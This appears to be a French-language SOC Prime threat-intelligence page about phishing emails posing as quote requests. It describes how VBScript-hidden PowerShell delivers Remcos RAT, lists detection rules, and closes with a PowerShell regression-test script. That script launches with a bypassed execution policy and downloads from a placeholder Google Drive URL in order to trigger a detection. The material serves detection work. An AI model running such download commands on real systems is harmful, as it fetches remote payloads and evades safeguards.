SOC Prime Bias: High

05 Oct 2026 16:41 UTC

Faux Demandes de Devis Utilisées dans des Attaques de Phishing par Malware

Author Photo
SOC Prime Team linkedin icon Suivre
Faux Demandes de Devis Utilisées dans des Attaques de Phishing par Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Des acteurs de la menace distribuent des e-mails de phishing déguisés en demandes de devis de projet pour livrer des charges utiles malveillantes. La campagne utilise VBScript pour dissimuler des commandes PowerShell, qui récupèrent finalement une charge utile à plusieurs étapes et Remcos RAT. Le logiciel malveillant final prend en charge l’exécution de commandes à distance, la journalisation des frappes, et l’exfiltration de données des systèmes compromis.

Enquête

AhnLab Security Intelligence Center (ASEC) a identifié une campagne de phishing dans laquelle des archives compressées contiennent des VBScripts cachés. Les chercheurs ont découvert une méthode d’obfuscation qui abuse de notepad.exe pour reconstruire le nom exécutable ‘powershell’ et repose sur une substitution de chaîne basée sur des jetons pour les commandes PowerShell. La charge utile à plusieurs étapes utilise également des objets COM pour effectuer un contournement UAC.

Atténuation

Les utilisateurs doivent valider le domaine de l’expéditeur et rester prudents lors de l’ouverture de pièces jointes ou d’hyperliens inattendus. Les organisations doivent configurer le filtrage des e-mails pour bloquer les extensions de fichiers suspectes telles que .vbs, .exe et .js. Les utilisateurs doivent également éviter de saisir des identifiants sensibles sur des URL non officielles ou suspectes reçues par e-mails non sollicités.

Réponse

Lorsqu’une activité malveillante est détectée, vérifiez la légitimité de l’e-mail d’origine et examinez l’activité de fichiers suspects dans %APPDATA%. Vérifiez l’exécution non autorisée de PowerShell et les indicateurs associés à Remcos RAT. Isolez les systèmes compromis du réseau pour empêcher toute communication C2 supplémentaire, activité latérale et exfiltration de données potentielle.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détections

LOLBAS WScript / CScript (via process_creation)

Équipe SOC Prime
01 oct. 2026

Possible infiltration/exfiltration de données / C2 via des services/outils tiers (via dns_query)

Équipe SOC Prime
01 oct. 2026

Possible infiltration/exfiltration de données / C2 via des services/outils tiers (via dns)

Équipe SOC Prime
01 oct. 2026

IOC (HashMd5) pour détecter : Phishing / Escroquerie par malware : Méfiez-vous des e-mails de phishing déguisés en demandes de devis

Règles IA de SOC Prime
01 oct. 2026

IOC (SourceIP) pour détecter : Phishing / Escroquerie par malware : Méfiez-vous des e-mails de phishing déguisés en demandes de devis

Règles IA de SOC Prime
01 oct. 2026

IOC (DestinationIP) pour détecter : Phishing / Escroquerie par malware : Méfiez-vous des e-mails de phishing déguisés en demandes de devis

Règles IA de SOC Prime
01 oct. 2026

Détecter script PowerShell se connectant au serveur C2 [connexion réseau Windows]

Règles IA de SOC Prime
01 oct. 2026

Exécution de PowerShell malveillant via obfuscation VBScript [Windows PowerShell]

Règles IA de SOC Prime
01 oct. 2026

Exécution de simulation

  • Narrative & Commandes de l’attaque : Un attaquant envoie un e-mail de spearphishing contenant un lien vers un document. Lorsque l’utilisateur clique sur le lien, il exécute une commande PowerShell cachée conçue pour extraire un script malveillant d’un dépôt Google Drive. L’attaquant utilise le export=download paramètre pour s’assurer que le fichier est téléchargé directement plutôt que visualisé dans un navigateur. L’objectif est d’exécuter une charge utile sans fichier en mémoire pour échapper à l’antivirus basé sur disque. La commande est construite pour déclencher la règle de détection spécifique ciblant ce modèle de téléchargement.

  • Script de test de régression :

    # Simulation de téléchargement de fichier PowerShell à partir de Google Drive via un modèle d'URL spécifique
    $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J"
    Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Téléchargement de la charge utile...'; $data = Invoke-WebRequest -Uri '$targetUrl';`""
  • Commandes de nettoyage :

    # Aucun fichier n'est écrit sur le disque dans cette simulation spécifique, 
    # mais nous arrêtons le processus s'il est toujours en cours d'exécution.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue